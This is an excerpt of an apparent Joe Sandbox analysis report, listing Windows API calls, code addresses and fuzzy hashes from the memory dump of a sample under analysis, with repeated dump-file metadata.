                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memmove$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 3253778849-0
                                                        • Opcode ID: 9d80155e7f2a53e1e73f8c24d63cc00193ec6995be1ce472b138d7b8ebbb779b
                                                        • Instruction ID: 48bb97577f499353bdcbb670ff551d8c81492ba1e1aca33beeffd4c891211df8
                                                        • Opcode Fuzzy Hash: 9d80155e7f2a53e1e73f8c24d63cc00193ec6995be1ce472b138d7b8ebbb779b
                                                        • Instruction Fuzzy Hash: 6F619A305002AAABCF05EF60DC86EFE37A9AF05708F054568F8596B2A3DB74ED55CB50
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 00140E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013FDAD,?,?), ref: 00140E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001402BD
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001402FD
                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00140320
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00140349
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0014038C
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00140399
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                        • String ID:
                                                        • API String ID: 4046560759-0
                                                        • Opcode ID: 632d8a208d16f9dac1e5ffd5b7489cda76d975c60b13488de9cc20630c51c37b
                                                        • Instruction ID: bd0536b726990dfb11fac2f2fb748ed34c46f5eb1fd3bd94d9c00b7115150a6a
                                                        • Opcode Fuzzy Hash: 632d8a208d16f9dac1e5ffd5b7489cda76d975c60b13488de9cc20630c51c37b
                                                        • Instruction Fuzzy Hash: F8515831208200AFC715EF64C885EAFBBE9FF89314F04492DF5858B2A2DB71E945CB52
                                                        APIs
                                                        • GetMenu.USER32(?), ref: 001457FB
                                                        • GetMenuItemCount.USER32(00000000), ref: 00145832
                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0014585A
                                                        • GetMenuItemID.USER32(?,?), ref: 001458C9
                                                        • GetSubMenu.USER32(?,?), ref: 001458D7
                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00145928
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountMessagePostString
                                                        • String ID:
                                                        • API String ID: 650687236-0
                                                        • Opcode ID: 0657d830b990540f31a5d31016b3cdd354be2993714883a0f7cd9d5c2e870d33
                                                        • Instruction ID: 207d7544c2dc10e73adf2b0172bee10b5ba18b9b3decbf91d01b5a28894ac4b8
                                                        • Opcode Fuzzy Hash: 0657d830b990540f31a5d31016b3cdd354be2993714883a0f7cd9d5c2e870d33
                                                        • Instruction Fuzzy Hash: EE515C35E00616EFCF15DF65C845AEEBBB5EF49720F114069E911BB362CB70AE418B90
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0011EF06
                                                        • VariantClear.OLEAUT32(00000013), ref: 0011EF78
                                                        • VariantClear.OLEAUT32(00000000), ref: 0011EFD3
                                                        • _memmove.LIBCMT ref: 0011EFFD
                                                        • VariantClear.OLEAUT32(?), ref: 0011F04A
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0011F078
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                        • String ID:
                                                        • API String ID: 1101466143-0
                                                        • Opcode ID: 5bf7667308de254180ae935ad420e439c8d51ad8176bab3ff3245e375b2ef254
                                                        • Instruction ID: f2e8bb58afe1bab67520ac791de5787304a7d237fa4aac418e002293de8b6e69
                                                        • Opcode Fuzzy Hash: 5bf7667308de254180ae935ad420e439c8d51ad8176bab3ff3245e375b2ef254
                                                        • Instruction Fuzzy Hash: E75147B5A00209EFCB14CF58C884AAAB7F9FF4C314B158569F959DB311E734E952CBA0
                                                        APIs
                                                        • _memset.LIBCMT ref: 00122258
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001222A3
                                                        • IsMenu.USER32(00000000), ref: 001222C3
                                                        • CreatePopupMenu.USER32 ref: 001222F7
                                                        • GetMenuItemCount.USER32(000000FF), ref: 00122355
                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00122386
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                        • String ID:
                                                        • API String ID: 3311875123-0
                                                        • Opcode ID: 928b6e0f4e8ca3e0d284427f8da0062568fc4b86086e4e53e829a6428f023800
                                                        • Instruction ID: b1690d0ed98c6a5d6f989db57a89daac4a77b1a562d79ce62214af4c0aec761f
                                                        • Opcode Fuzzy Hash: 928b6e0f4e8ca3e0d284427f8da0062568fc4b86086e4e53e829a6428f023800
                                                        • Instruction Fuzzy Hash: 2A51D230A00269FFDF25CF68E988BADBBF5FF19314F104129E8119B2A0D3788965CB51
                                                        APIs
                                                          • Part of subcall function 000C2612: GetWindowLongW.USER32(?,000000EB), ref: 000C2623
                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 000C179A
                                                        • GetWindowRect.USER32(?,?), ref: 000C17FE
                                                        • ScreenToClient.USER32(?,?), ref: 000C181B
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000C182C
                                                        • EndPaint.USER32(?,?), ref: 000C1876
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                        • String ID:
                                                        • API String ID: 1827037458-0
                                                        • Opcode ID: 5d6b98358b92d30585d63e5b284588c10e2a4d8090e2bc87644f2f85437bba17
                                                        • Instruction ID: cb348dd0eab96aac49527420fffcf77be6899af6e0eedac52100bad3b57a697b
                                                        • Opcode Fuzzy Hash: 5d6b98358b92d30585d63e5b284588c10e2a4d8090e2bc87644f2f85437bba17
                                                        • Instruction Fuzzy Hash: CA41AE34104700AFD720DF25CC84FBA7BE9EB46724F04466DFAA4866B2CB309986DB61
                                                        APIs
                                                        • ShowWindow.USER32(001857B0,00000000,01444A18,?,?,001857B0,?,0014B5A8,?,?), ref: 0014B712
                                                        • EnableWindow.USER32(00000000,00000000), ref: 0014B736
                                                        • ShowWindow.USER32(001857B0,00000000,01444A18,?,?,001857B0,?,0014B5A8,?,?), ref: 0014B796
                                                        • ShowWindow.USER32(00000000,00000004,?,0014B5A8,?,?), ref: 0014B7A8
                                                        • EnableWindow.USER32(00000000,00000001), ref: 0014B7CC
                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0014B7EF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$Enable$MessageSend
                                                        • String ID:
                                                        • API String ID: 642888154-0
                                                        • Opcode ID: 0c3fa6c12ad229404181752265a4858bde5a80cd121a6f94e10211358b58eeb2
                                                        • Instruction ID: 2e69aa535dc27b2b2123203af2d9b9712fdf93cb38226ad4b950726b2363f4b8
                                                        • Opcode Fuzzy Hash: 0c3fa6c12ad229404181752265a4858bde5a80cd121a6f94e10211358b58eeb2
                                                        • Instruction Fuzzy Hash: EA417C34609240AFDB22CF28C4DAB957BE1FF45312F1841B9EA488F6B2C731E856CB50
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00134E41,?,?,00000000,00000001), ref: 001370AC
                                                          • Part of subcall function 001339A0: GetWindowRect.USER32(?,?), ref: 001339B3
                                                        • GetDesktopWindow.USER32 ref: 001370D6
                                                        • GetWindowRect.USER32(00000000), ref: 001370DD
                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0013710F
                                                          • Part of subcall function 00125244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001252BC
                                                        • GetCursorPos.USER32(?), ref: 0013713B
                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00137199
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                        • String ID:
                                                        • API String ID: 4137160315-0
                                                        • Opcode ID: 247f7dbd3bf6b6bca09c8420ab0e8976b6cd040663657209548b6090424ab894
                                                        • Instruction ID: e5b4f8aa845bb3970b4ee26817a6141837dfc83f842dc8df56d39dfaaf2c4605
                                                        • Opcode Fuzzy Hash: 247f7dbd3bf6b6bca09c8420ab0e8976b6cd040663657209548b6090424ab894
                                                        • Instruction Fuzzy Hash: 9531D272509305ABD720DF14D849F9BBBEAFF89314F000929F58597291C730EA49CB92
                                                        APIs
                                                          • Part of subcall function 001180A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001180C0
                                                          • Part of subcall function 001180A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001180CA
                                                          • Part of subcall function 001180A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001180D9
                                                          • Part of subcall function 001180A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001180E0
                                                          • Part of subcall function 001180A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001180F6
                                                        • GetLengthSid.ADVAPI32(?,00000000,0011842F), ref: 001188CA
                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001188D6
                                                        • HeapAlloc.KERNEL32(00000000), ref: 001188DD
                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 001188F6
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,0011842F), ref: 0011890A
                                                        • HeapFree.KERNEL32(00000000), ref: 00118911
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                        • String ID:
                                                        • API String ID: 3008561057-0
                                                        • Opcode ID: cd0b6074e4f1fd2d0199a053ec1b4759bfc490c297b52df10a00487ff6d7be06
                                                        • Instruction ID: adde6e3c05fb9c74112e9898ef2cbcb45ed43244d151cf8c2d508b51b6a42343
                                                        • Opcode Fuzzy Hash: cd0b6074e4f1fd2d0199a053ec1b4759bfc490c297b52df10a00487ff6d7be06
                                                        • Instruction Fuzzy Hash: B6117F75501209FFDB189FA4DC09BFE77A9EB85315F10816DF84597220CB329986DB60
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001185E2
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 001185E9
                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 001185F8
                                                        • CloseHandle.KERNEL32(00000004), ref: 00118603
                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00118632
                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00118646
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                        • String ID:
                                                        • API String ID: 1413079979-0
                                                        • Opcode ID: 269369c51cc009315544e48443c07015c455abd6b9a9f0e5cc03cdc071b43f29
                                                        • Instruction ID: b944a9a73420e21117021117235b55b2c34086b38399323ce71b608f196341e8
                                                        • Opcode Fuzzy Hash: 269369c51cc009315544e48443c07015c455abd6b9a9f0e5cc03cdc071b43f29
                                                        • Instruction Fuzzy Hash: E3116A7650024DABDF118FA4DD49FDE7BA9EF49354F048168FE04A2260C7768DA2EB60
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0011B7B5
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0011B7C6
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0011B7CD
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0011B7D5
                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0011B7EC
                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0011B7FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$Release
                                                        • String ID:
                                                        • API String ID: 1035833867-0
                                                        • Opcode ID: 7859f64075216e42c8777ba46e0bdb6ad93c4d64862ec5b16b971ddca2b54696
                                                        • Instruction ID: a728022d840f61e07195252080edb238326dfc171776faa007b9716af757c185
                                                        • Opcode Fuzzy Hash: 7859f64075216e42c8777ba46e0bdb6ad93c4d64862ec5b16b971ddca2b54696
                                                        • Instruction Fuzzy Hash: 5A017179A00219BBEB109BB69C45A5EBFB8EB49751F044079FA08A7391D6309C41CF90
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 000E0193
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 000E019B
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 000E01A6
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 000E01B1
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 000E01B9
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 000E01C1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: c0e1d68b1bac4b1d5d6a191d7ae6ac9f012bf6432d0f93457a6dd32c05791f9f
                                                        • Instruction ID: 1f62fff1bc07177d98e095aef0a3b29e02b90424dd40b0918ea9447854b417e8
                                                        • Opcode Fuzzy Hash: c0e1d68b1bac4b1d5d6a191d7ae6ac9f012bf6432d0f93457a6dd32c05791f9f
                                                        • Instruction Fuzzy Hash: 8C016CB09027597DE3008F5A8C85B52FFA8FF19354F00411FA15C47A41C7F5A868CBE5
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001253F9
                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0012540F
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0012541E
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0012542D
                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00125437
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0012543E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 839392675-0
                                                        • Opcode ID: 9cc46551e7ba0657f9fdacacffcf6eaf16977ae192a897d9b818017ccdb2f345
                                                        • Instruction ID: 2cc4bbb09d446f18ff0418cdd1d97d587d8a2ddd172920495f079563b79bd123
                                                        • Opcode Fuzzy Hash: 9cc46551e7ba0657f9fdacacffcf6eaf16977ae192a897d9b818017ccdb2f345
                                                        • Instruction Fuzzy Hash: 5EF01D36241558BBE7215BA29C0DEEB7A7CEBC7B11F00016DFA04D1561A7A11A4286B5
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00127243
                                                        • EnterCriticalSection.KERNEL32(?,?,000D0EE4,?,?), ref: 00127254
                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,000D0EE4,?,?), ref: 00127261
                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,000D0EE4,?,?), ref: 0012726E
                                                          • Part of subcall function 00126C35: CloseHandle.KERNEL32(00000000,?,0012727B,?,000D0EE4,?,?), ref: 00126C3F
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00127281
                                                        • LeaveCriticalSection.KERNEL32(?,?,000D0EE4,?,?), ref: 00127288
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: eb608bf3247c7f92005e97513a95e47cad9fc1662db508cd476952cfe2819179
                                                        • Instruction ID: 306f9848299878c709ef766d06c386c3ed58f3cce09d2596bd83b97f88f986d5
                                                        • Opcode Fuzzy Hash: eb608bf3247c7f92005e97513a95e47cad9fc1662db508cd476952cfe2819179
                                                        • Instruction Fuzzy Hash: 2CF05E3A540612EBE7112B64ED4CDDB7769EF46702B100539F503915B0CBB698A2CB60
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0011899D
                                                        • UnloadUserProfile.USERENV(?,?), ref: 001189A9
                                                        • CloseHandle.KERNEL32(?), ref: 001189B2
                                                        • CloseHandle.KERNEL32(?), ref: 001189BA
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 001189C3
                                                        • HeapFree.KERNEL32(00000000), ref: 001189CA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                        • String ID:
                                                        • API String ID: 146765662-0
                                                        • Opcode ID: d816d8b14eac42bd610ca371238062d698ffc32eefedd14d2c6e231033d64ac1
                                                        • Instruction ID: 555f3c6a42d09015caefffa15246113368969c69052b9c94b8666778203da99b
                                                        • Opcode Fuzzy Hash: d816d8b14eac42bd610ca371238062d698ffc32eefedd14d2c6e231033d64ac1
                                                        • Instruction Fuzzy Hash: C9E07D7A104505FBD7011FE5EC0C956BFB9FF8AB627504635F219C1A70CB3254A2DB50
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00138613
                                                        • CharUpperBuffW.USER32(?,?), ref: 00138722
                                                        • VariantClear.OLEAUT32(?), ref: 0013889A
                                                          • Part of subcall function 00127562: VariantInit.OLEAUT32(00000000), ref: 001275A2
                                                          • Part of subcall function 00127562: VariantCopy.OLEAUT32(00000000,?), ref: 001275AB
                                                          • Part of subcall function 00127562: VariantClear.OLEAUT32(00000000), ref: 001275B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
